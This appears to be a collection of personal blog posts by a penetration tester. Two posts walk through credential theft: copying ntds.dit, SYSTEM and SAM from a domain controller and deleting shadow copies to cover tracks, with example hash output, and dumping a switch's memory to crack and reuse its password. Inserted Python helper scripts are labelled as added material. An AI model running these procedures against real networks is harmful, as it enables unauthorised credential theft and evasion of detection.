Passed the GWAPT cert

I took the SANS GIAC Web Application Penetration Tester (GWAPT) class back in December of 2014 in Washington DC with Eric Conrad. I had been procrastinating for several months before I finally had to break down and take the certification before my time expired in late April 2015.
I spent a few days going over the books to refresh myself on the content that we went over, and took one of the practice exams and actually did not do too well on it. Never having taken a SANS cert before, I was not sure what to expect, and probably should have actually allowed the 2 hours to sit the practice test. I rushed through it and guessed on a lot of the questions, and did not remember going over half of the info. (Note to self: actually read the questions and each answer and not just say "that looks good".) Overall I was a little frustrated after the first practice exam, since I have been doing this for about 3 years now, and many of the questions seemed to be based on opinion, and not actual facts. Several of the questions had more to do with general penetration testing than actual web application testing, like needing to know the TTL from a DNS request for a domain name.
So I read the books for a few more days before taking the second practice test, which I did much better on, since I had some idea of what to expect on the test. I did rush through it again, actually doing the entire test in 48 minutes, which is really not that great, but I just wanted to make sure I had some idea of what the real test would be like. Two days later I sat for the actual GWAPT test, and planned to take my time and read every question thoroughly.
I sat for the exam on April 9, 2015. I finished the test and passed it fairly easily, but was somewhat perplexed that it had nothing similar to the practice tests. It seemed that the practice exams had nothing to do with the actual exam. Many of the questions were on topics that were in the books, but never brought up in the practice tests, which frustrated me a little, since I had to spend a little more time looking for some of the answers that I had not really gone over previously.
So for anyone planning on sitting the exam who has not taken a SANS cert before, plan accordingly to make sure you know all of the content in the books. Do not expect that the practice exams will actually prepare you for the real test; they might actually make you study information that is never asked on the exam.

Moving to Google Domains from 1and1.com

Well, I am moving some of my domains to the beta Google Domains, away from 1and1.com hosting. It has not been the easiest thing to do: I have unlocked my domains and disabled private registration. However, I had several sites that were still locked an hour after changing their status. All of them were finally released to allow me to request the transfer to Google.
One main reason I am moving from 1and1.com is that they continually raise their prices, and I am not a business, so I do not make money from any of my sites. The other is that their mail services have become awful, unless you want to move to their newer Exchange mail service for a $5 per account per month fee.
I have used them for about eight years, and originally started with their beginner package for $2.99 per month, but it is now up to $4.99 per month. While they do add some features, it seems that they make others worse for the older subscribers who do not upgrade to a better package.
The new MyWebsite package is $6.99 a month, with a few more options than I currently have, and I am guessing that my account will soon receive a price update to be closer to that price. Along with the price updates to all domain names I have registered: they used to cost me between $6.99 and $8.99, and are now all $14.99 per domain. Since I have 17 domains, that has made a drastic increase to my costs to host websites. Another thing that pissed me off was that they sent a notice that they were discontinuing the use of PHP 5.2, so I migrated all of my systems to 5.4 or 5.5. They forgot to mention that I needed to discontinue the support for 5.2 in my billing, and billed me $4.99 for a month of support. They never mentioned that I had to do this or that it was added to my billing and I had to remove it.
I had always had an issue with the 1and1.com limited MySQL DB support; only allowing 100MB of data in one database is a little crappy. Especially when I can have a bunch of DB instances but only 100MB on each one, it makes it a pain to have to program a web site to use multiple DB instances.
I transferred nine domains and was notified that it takes 5 days for 1and1.com to transfer the domain to the new provider; they state that: “1&1 will release the domain after five(5) days as required by ICANN if there are no restrictions, disputes, etc.” I guess I will have to wait and see how things will be at Google, and it will give me some time to figure out what I want to point the domain names to. I have moved one to a Bitbucket repo already, and will just keep it pointed there once it is moved.
We will see how things go. I will need to move six more domains, but they are all used for email, and I am not sure how long the outage will be on them. I will have to test one to see how things go, and what the outage on email will be. Then I have one that is tied to the main account for 1and1.com, and I am not sure how that will work to transfer it since it is tied to the hosting package. It is also the domain that is hosting this blog, so I will need to figure out where to host this site that will have access to PHP and MySQL, to allow me to host a couple of web applications.

Bahrain – Working for another manager is trying my patience

Well, I am almost done with my small tour in Bahrain, and will be glad to be home. I will miss some of the people; they are great and were a joy to work with.
As for the project that my company is contracted on, I am a little pissed that nothing has really been done since I last left from working over here. Well, none of the projects that we were supposed to be working on. Many of the other vendors that had projects have finished, or are scheduled to finish, their projects. It seems that the manager in charge has either not worried about the project or is clueless that his employees are lying to him.
The two people that were hired to come over here and work for the last year, who are not security-minded people by the way, did almost nothing during the time they were over here. From what I can tell, it looks like they relied on other vendors to do most of the work and they took all of the credit for it. Most of the projects are not even actually started, but are marked as partially complete. I have been working on a Bit9 installation for a couple of weeks; there are 1200+ workstations in the environment, and only 130 systems have the software installed. There are no real policies defined, and only two workstations are locked down. The manager believes that all systems have the software installed and they are completely protected. I tried to let him know, and he did not seem to want to hear it. I dropped the conversation and began working on a solution to the issue.
I am ready to get back to pentesting, where I can actually do some good; well, I will keep telling myself that. Many of my customers just want a band-aid to cover over the problems, and not really work on fixing things, but I still get to have fun in the process.

Heading back to Bahrain for my 3rd Trip

Heading out Monday July 21st to Bahrain for another 45 days of excitement in Bahrain. My company had been renting an apartment since last year, but they let the lease lapse, so I will be staying in the Marriott for the stay. Which is fine with me; I like getting the points, and plus it has free breakfast. I guess they are expecting me to look for another apartment to rent; not sure why the last person who was there did not do this, since he works on the project full time (or is supposed to).
Not sure what I will be working on this time around, since I have not been involved with this project since last year when I was there. I have had little information given to me from the director of this project, and the employees assigned to the director of this project have been little help giving me information.
I did not really want to head back, but my boss sort of gave me a “you do not really have an option” speech. I was supposed to be heading to Defcon during this time frame and told him I would prefer to do that than go to Bahrain. I was then told that was not a good reason to not go on the trip, and something like “I cannot justify you going to training instead of this trip” or something similar to that. This did not really make me happy. They originally wanted me to go for 90 days, but I had to do military duty, so I could only squeeze in the 45 days to go (well, that is what I told them). Not like they could really argue about me not being able to go, since it is the federal government and all.
I was surprised that they were expecting me to cover this time frame for the project, but it seems that one of the two people they hired does not want to go back over there anymore. I was a little pissed about that, and think they need to fire him since he was specifically hired to do this project. I am sure that will not happen, since they have him doing training for AlienVault software occasionally.
This is partly one reason I started researching penetration testing companies. I have found a few I like, but am not sure if I will be looking for a new place to work just yet. I need to see if they are expecting me to make more trips back to Bahrain. I already told my director that I would not be heading back over again, so not to even ask me about it.

Getting Hashes from NTDS.dit file

I read a write-up from @Mubix about doing this and noticed that some changes had come to the NTDSXtract software which made things a little easier, so I decided to do a write-up on the two versions.
Why do you want to do this anyway?
The reason you would want to pull the ntds.dit file from a Domain Controller after you have compromised it is because you do not want to create a new Domain Administrator account (it could set off alerts) and you need password hashes; or you need a password for another account to access data you want (i.e. SQL Server accounts).

Get the ntds.dit and SYSTEM from Volume Shadow Copy on a Domain Controller

1. Vssadmin tool

1.1 List Volume Shadow Copies on the system:

Example: ‘vssadmin list shadows’ with no shadows available:
C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
No items found that satisfy the query.

1.2. Create a new Volume Shadow Copy of the current drive:

Example: ‘vssadmin create shadow’:
C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.
Successfully created shadow copy for ‘c:’
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

2. Pull files from the Volume Shadow copy

copy \\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .
[X] refers to the shadow copy number; in the examples above the latest version is HarddiskVolumeShadowCopy1 (there could be multiple copies, use the last one listed).
I would also recommend getting a current copy of SYSTEM from the registry just in case:
reg SAVE HKLM\SYSTEM c:\SYS
I have had a couple of times where the SYSTEM file from the shadow copy was corrupt.

3. Delete the shadows to cover your tracks:

vssadmin delete shadows /for=<ForVolumeSpec> [/oldest | /all | /shadow=<ShadowID>] [/quiet]
vssadmin delete shadows /for=C: /shadow={e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}

4. Optional VSSOwn Script to help with this task:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

5. Now that you have the files, it is time to get the hashes

5.1 Utilities needed:

  • libesedb
  • ntdsxtract

5.2 libesedb

https://code.google.com/p/libesedb/
http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz

Extract the files

# tar -xzvf libesedb-alpha-20120102.tar.gz

Compile/make libesedb

# cd libesedb-20120102
# ./configure
# make
Need to move this somewhere like ‘/usr/local/’
# mv esedbtools/ /usr/local
# cd esedbtools/

esedbexport usage:

Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ]
[ -T table_name ] [ -hvV ] source
source: the source file
-c:     codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h:     shows this help
-l:     logs information about the exported items
-m:     export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t:     specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T:     exports only a specific table
-v:     verbose output to stderr
-V:     print version

Run esedbexport to extract ntds.dit data :

./esedbexport  -t  <Directory to export data to(will add .export to the end)> <ntds.dit file>
# ./esedbexport  -t ~/ntds ~/ntds.dit
esedbexport 20120102
Opening file.

Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

5.3 NTDSXtract:

http://www.ntdsxtract.com/
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_2_beta.zip
# unzip ntdsxtract_v1_0.zip
# cd NTDSXtract 1.0/
To update to the new 1.2 Beta version, unzip the contents inside the “NTDSXtract 1.0” directory
(you might want to rename the directory to just NTDSXtract):
# unzip ntdsxtract_v1_2_beta.zip

Usage for dsusers.py (Version 1.0 and 1.2 Beta)

Ver 1.0
 # python dsusers.py
DSUsers
Extracts information related to user objects
usage: dsusers.py <datatable> <linktable> [option]
options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
--passwordhashes <system hive>
Extract password hashes
--passwordhistory <system hive>
Extract password history
--certificates
Extract certificates
--supplcreds <system hive>
Extract kerberos keys
--membership
List groups of which the user is a member
Ver 1.2
 # python ../NTDSXtract 1.0/dsusers.py 
DSUsers v1.2
Extracts information related to user objects
usage: ../NTDSXtract 1.0/dsusers.py <datatable> <linktable> <work directory> [option]
datatable
The path to the file called datatable extracted by esedbexport
  linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its
cache files and output files. If the directory does not exist
it will be created.

options:
--rid <user rid>
List user identified by RID
--name <user name>
List user identified by Name
    --syshive <path to system hive>
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile    <name of the LM hash output file>
--ntoutfile      <name of the NT hash output file>
--pwdformat  <format of the hash output>
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
--passwordhashes
Extract password hashes
    --passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract kerberos keys
--membership
List groups of which the user is a member
--csvoutfile <name of the CSV output file>
The filename of the csv file to which ntdsxtract should write the output

Extract user info:

Ver 1.0
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 --passwordhashes ~/sys --passwordhistory ../sys
Running with options:
Extracting password hashes
Extracting password history
Initialising engine...
Scanning database - 100% -> 40933 records processed
Extracting schema information - 100% -> 4142 records processed
Extracting object links...

List of users:
==============
Record ID:           1815
User name:           Administrator
User principal name: Administrator@DOMAIN
SAM Account name:    Administrator
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 3543ea4c-f755-4758-97c0-3d63dffc96ad
SID:  S-1-5-21-657512695-1375287660-316888650-500
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 16:10:29
Account expires:      Never
Password last set:    2006-08-22 11:53:34.828125
Last logon:           2013-10-03 19:11:25.366397
Last logon timestamp: 2013-09-30 10:43:09.479359
Bad password time     2013-10-03 17:36:20.168265
Logon count:          65535
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Domain Admins Administrator
Password hashes:
    Administrator:$NT$0817033191709a45c93baa986d933d0e:::
Password history:
    Administrator_nthistory0:$NT$0817033191709a45c93baa986d933d0e:::
    Administrator_nthistory1:$NT$70aa17fabbaf3b0511f430844c6de431:::
    Administrator_lmhistory0:f8eab0fa471aff3edab057c59e5d0aa5:::
Record ID:           1816
User name:           Guest
User principal name:
SAM Account name:    Guest
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 2e792141-c4be-43b2-a4f5-079e5d05e184
SID:  S-1-5-21-657512695-1375287660-316888650-501
When created:         2004-01-16 19:31:25
When changed:         2013-10-03 15:19:28
Account expires:      Never
Password last set:    Never
Last logon:           Never
Last logon timestamp: Never
Bad password time     2013-10-03 18:18:45.096975
Logon count:          0
Bad password count:   1
User Account Control:
Disabled
PWD Not Required
NORMAL_ACCOUNT
PWD Never Expires
Ancestors:
$ROOT_OBJECT$ priv DOMAIN main Users Guest
Password hashes:
Password history:
...(continues for each account)...
Ver 1.2 (Output in JTR Format)
python dsusers.py ~/ntds.export/datatable.3  ~/ntds.export/link_table.4 ~/TEMP  --passwordhashes --passwordhistory --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM

List of users:
==============
Record ID:           32777
User name:           joe smith
User principal name: email@address.net
SAM Account name:    jsmith
SAM Account type:    SAM_NORMAL_USER_ACCOUNT
GUID: 14c15e2a-8f7c-4404-a63c-cb6a4c689c00
SID:  S-1-5-21-349701255-3731294407-2303513147-3800
When created:         2005-06-01 13:50:37
When changed:         2013-12-12 15:08:12
Account expires:      Never
Password last set:    2013-10-07 13:20:19.146593
Last logon:           2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time     2013-12-11 00:04:52.446209
Logon count:          6239
Bad password count:   0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users joe smith
Password hashes:
name:$NT$2e8fc4b95229a6ea67b1f69d04ee4000:::
name:e4c2436ddd1f655c6eedd0fa5525f000:::
...(continues for each account)...
Version 1.2 allows you to extract the hashes into two files, one for LM hashes and the other for NT hashes, and currently supports two hash output formats: Ophcrack and John.
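Once dsusers.py has produced its “List of users” report, a defender reviewing the domain's password hygiene wants it in structured form rather than scrolling through it. The following Python is an added example, not part of the original post or of NTDSXtract: it parses the report layout shown above (including the “Bad password time” line, which is printed without a colon) and flags accounts that still carry LM hashes, have PWD Not Required or PWD Never Expires set, or have not changed their password within a year. The sample report, its names and every hash value in it are constructed.

```python
import re
from datetime import datetime

# Scalar fields of dsusers.py output, longest first so "Last logon" cannot match
# inside "Last logon timestamp"; "Bad password time" has no colon, hence ":?".
SCALARS = sorted(["Record ID", "User name", "User principal name", "SAM Account name",
                  "SAM Account type", "GUID", "SID", "When created", "When changed",
                  "Account expires", "Password last set", "Last logon", "Last logon timestamp",
                  "Bad password time", "Logon count", "Bad password count"], key=len, reverse=True)
SECTIONS = ["User Account Control", "Ancestors", "Password hashes", "Password history"]
SCALAR_RE = re.compile(r"^(%s):?\s*(.*)$" % "|".join(map(re.escape, SCALARS)))
SECTION_RE = re.compile(r"^(%s):\s*$" % "|".join(map(re.escape, SECTIONS)))
LM_RE = re.compile(r"^[^:]+:[0-9a-fA-F]{32}:")   # LM hash line; NT lines carry $NT$

def parse_dsusers(text):
    """Turn the 'List of users' report into one dict per account."""
    users, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("=", "List of users")):
            continue
        m = SCALAR_RE.match(line)
        if m:
            if m.group(1) == "Record ID":          # every account starts here
                cur = {s: [] for s in SECTIONS}
                users.append(cur)
            if cur is not None:
                cur[m.group(1)] = m.group(2)
            section = None
        elif SECTION_RE.match(line):
            section = SECTION_RE.match(line).group(1)
        elif cur is not None and section is not None:
            cur[section].append(line)              # UAC flag, ancestor or hash line
    return users

def audit_users(users, now, max_age_days=365):
    """Return {SAM account name: [findings]} for accounts that need attention."""
    findings = {}
    for u in users:
        uac, notes = set(u["User Account Control"]), []
        lm = [h for h in u["Password hashes"] + u["Password history"] if LM_RE.match(h)]
        if lm:
            notes.append("LM hash present (%d entries)" % len(lm))
        notes += [f for f in ("PWD Not Required", "PWD Never Expires") if f in uac]
        last_set = u.get("Password last set", "Never")
        if "Disabled" not in uac and last_set != "Never":
            age = (now - datetime.strptime(last_set.split(".")[0], "%Y-%m-%d %H:%M:%S")).days
            if age > max_age_days:
                notes.append("password %d days old" % age)
        if notes:
            findings[u.get("SAM Account name", "?")] = notes
    return findings

# Constructed sample in the dsusers.py 1.0 layout; every value is made up.
SAMPLE = """\
List of users:
==============
Record ID:           1815
SAM Account name:    Administrator
Password last set:    2006-08-22 11:53:34.828125
Bad password time     2013-10-03 17:36:20.168265
User Account Control:
NORMAL_ACCOUNT
PWD Never Expires
Password hashes:
    Administrator:$NT$00000000000000000000000000000000:::
Password history:
    Administrator_nthistory0:$NT$11111111111111111111111111111111:::
    Administrator_lmhistory0:22222222222222222222222222222222:::
Record ID:           1816
SAM Account name:    Guest
User Account Control:
Disabled
PWD Not Required
PWD Never Expires
Record ID:           32777
SAM Account name:    jsmith
Password last set:    2013-10-07 13:20:19.146593
User Account Control:
NORMAL_ACCOUNT
Password hashes:
jsmith:$NT$33333333333333333333333333333333:::
"""

def audit_sample():
    # Audit the constructed sample as of 2013-12-12, the era of the report above.
    return audit_users(parse_dsusers(SAMPLE), datetime(2013, 12, 12))
```

On a real report, pass the dsusers.py output file's text to parse_dsusers() and the current time to audit_users(); disabled accounts are skipped for the password-age check but still reported for the flags they carry.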

VxWorks Memory Dump

While running an internal vulnerability scan I noticed that one of the devices was showing vulnerable to VxWorks Memory Dump.
This is exploitable by using the Metasploit wdbrpc_memory_dump module, so I fired it up and loaded the module to see if I could pull the memory from this device.
I ran the exploit against the system and it began dumping the memory; it got to about 31% before stopping, so I had to restart it from the OFFSET value it stopped at. This happened 3 more times before it finished. The output file was about 256MB in size, so I was not sure if it had good information from the system or just crap.
Since it was a hex dump of the memory, I ran strings against the file to get a list of information and look for possible information to use. I put the output into another file to search through with “grep”.
# strings vxworks_memory.dmp > strings.memory.dmp
I was able to determine that it was a network switch from viewing the IP address on port 80 (I looked back at Nessus to see what ports were open and what it thought the device was), so I decided to search for words like “password”, “enable”, and “encryption”.
At first nothing showed up that was any good or valuable to use, so I decided to search for partial words, like “assw”, “able” and “crypt”, to see if the words had been split across lines in the memory dump.
# cat strings.memory.dmp | grep -i assw
# cat strings.memory.dmp | grep -i crypt
I discovered that the enable hash was in the dump, so I guessed that the password could also be stored in there as well.
Taking the new file from the strings output (strings.memory.dmp), I ran it through “sort” with the unique flag and output that into another file to use as my password list starting point.
# cat strings.memory.dmp | sort -u > passlist.list
With the new list of possible passwords, and hoping that one copy of it was completely intact and not split across a line, I ran it through PW-Inspector to narrow it down to a more manageable number of realistic passwords with a realistic length.
# pw-inspector -i passlist.list -o passlist.uniq.list -lunps -m 8 -M 16
Now that I had narrowed the password list down to a more manageable size, I ran John against the hash with the shorter list.
In no time at all I had the password for the hash; the switch was not Cisco and was only using an MD5 hash, which made it rather simple to crack.
Now that I had the password, I needed to search for a user name. So I started searching for common names in the file, and admin came back multiple times with the word user next to it, so with a little searching on Google, I discovered that admin was the default user on this switch.
From there I tried to SSH to the switch, but was denied due to the use of private keys and not passwords for SSH, so I tried telnet to connect to the switch and was able to log in.
From there I had access to see all of the other VLANs and IP address space that I did not have access to before. Now time to see where else the password is used.
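The strings / grep / sort -u / pw-inspector pipeline above is easy to reproduce in one script, which is handy when checking whether a device of your own leaks credential material in a memory image before an assessor finds it. The Python below is an added example, not from the original post: it carves printable runs the way strings(1) does, searches for a keyword even when a non-printable byte splits it across two carved strings (the “assw” trick above), and keeps unique tokens by length and character-class count, which approximates pw-inspector's -m/-M/-c options rather than reproducing them exactly. The memory image is a constructed byte string, not a real VxWorks dump.

```python
import string

def carve_strings(data, min_len=4):
    """Return (offset, text) for every run of >= min_len printable ASCII
    bytes, the same runs strings(1) prints for a binary file."""
    runs, start = [], None
    for i, b in enumerate(data + b"\x00"):          # sentinel closes a trailing run
        if 0x20 <= b < 0x7F:
            if start is None:
                start = i
        else:
            if start is not None and i - start >= min_len:
                runs.append((start, data[start:i].decode("ascii")))
            start = None
    return runs

def search_fragments(runs, needle):
    """Case-insensitive search for needle in each carved string and across the
    boundary of two adjacent strings: a keyword cut in half by a non-printable
    byte is invisible to grep on the strings output. Yields (offset, text, split)."""
    needle, hits = needle.lower(), []
    for i, (off, text) in enumerate(runs):
        if needle in text.lower():
            hits.append((off, text, False))
        elif i + 1 < len(runs):
            nxt = runs[i + 1][1]
            pos = (text + nxt).lower().find(needle)
            if 0 <= pos < len(text):               # starts here, ends in the next run
                hits.append((off, text + "|" + nxt, True))
    return hits

def candidate_secrets(runs, min_len=8, max_len=16, min_classes=2):
    """Unique whitespace-separated tokens (and whole strings) within the length
    range that mix at least min_classes character classes; roughly what
    'sort -u | pw-inspector -m 8 -M 16' kept in the post (an approximation)."""
    def classes(tok):
        return sum((any(c.islower() for c in tok), any(c.isupper() for c in tok),
                    any(c.isdigit() for c in tok),
                    any(c in string.punctuation for c in tok)))
    seen = set()
    for _, text in runs:
        for tok in [text] + text.split():
            if min_len <= len(tok) <= max_len and classes(tok) >= min_classes:
                seen.add(tok)
    return sorted(seen)

# Constructed sample image (not a real VxWorks dump): intact config strings,
# a "password" label split by a NUL byte, and some binary noise in between.
SAMPLE_DUMP = (b"\x00\x00hostname switch01\x00\x7f\xff"
               b"enable password md5 0123456789abcdef0123456789abcdef\x00\x00\x00"
               b"pass\x00word admin Sw1tchP@ss\x00\x01\x02usr\x00\x00")
```

Run carve_strings() over the dump, then search_fragments() for the labels you care about and candidate_secrets() to see how much of the image is plausible credential material; a hit with split=True is the case that plain grep on the strings output misses.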

Fun times during NVA/PT assessments over the past 3 months

Some fun things I have had to deal with during some NVA/PT assessments for customers over the past 3 months.
You begin scanning 5 hosts and the customer's switch rolls over, everything stops responding, and the customer calls you asking what you did.
I enjoy customers that leave usernames and passwords for critical systems on a web page with unauthenticated access, and they say that it is not a security vulnerability.
You find access to a customer's Github.com site and your boss tells you to not explore the site and only report that you had access to log in, since the site was not in scope.
You report a finding that you found last year for the same customer, and it allows you complete access to the server.
You find default access to a website that controls the customer's network switches, UPS, and other main pieces of their infrastructure, and the customer says he is not worried about it.
You find systems that are missing patches from 2004, and the customer tells you that it is not critical. You tell them to remove it from the network, and they tell you they need it for some other system that is important.
I am sure I will have more to come in the next few months, since my boss is stacking up assessments like they are going out of style, and we are still trying to hire a new pentester.

My First Vegas Trip

Vegas for my birthday!
My twin sister decided my wife and I needed to meet her and her husband in Las Vegas for our birthday, and have a long weekend enjoying the place.
While I like to travel, and this being my first trip to Vegas, I can say that it is not on my top list of places to visit. There are several issues I have with Vegas, all of which are just personal preferences about what I like to do, see and not be subjected to.
List of things I do not like about Vegas:
  1. Cigarette smoke (I cannot stand having to walk through the casino floor)
  2. Being around drunk people (generally they act really stupid and annoying)
  3. Large crowds (especially when many of them are drunk and acting stupid)
  4. Someone trying to hand me something all the time (I really do not want to go to the strip club)
  5. People asking if I want to see a show about every 10 feet. (If I wanted to see a show I would purchase some tickets)
  6. I am not a gambler (I can waste my money on better things)
    (If I did gamble I could not stand being in a smoke filled room doing it)
I did enjoy some parts of Vegas, but there are many I cannot stand.
There are a lot of neat things to see in Vegas, some interesting shows to watch (most are way over priced), and the hotels have very elaborate themes.
List of things I did like about Vegas:
  1. The hotel decor (Caesars Palace, The Bellagio, The Venetian, etc.)
  2. The wide selection of places to eat (ones that I have not been to before)
  3. Visiting Hoover Dam (which was probably the most exciting part of the whole trip)(I know it is not in Vegas)
  4. The shops/stores (mainly ones that we do not have locally)
The Hotel:
I was not impressed with the NY NY hotel; I think it is overpriced, and the accommodations are lacking. It is no better than staying in a Holiday Inn Express, except it costs more.
You are charged a $20 per day resort fee, which makes the seemingly decent price for the room not worth the stay. Your $79 room turns into a $110 room after fees and taxes.
The food selection in the hotel was very lacking, and not really New York-ish; sure, it had Nathan's Hot Dogs, a pizza place, an Irish bar. It did not have a deli sandwich shop, coffee carts, or many other things you would really associate with New York.
Well, enough complaining about Las Vegas; some people seem to really enjoy it, and I guess others could care less about the place. So if you like Vegas, go and have your fun, but I will be going somewhere else.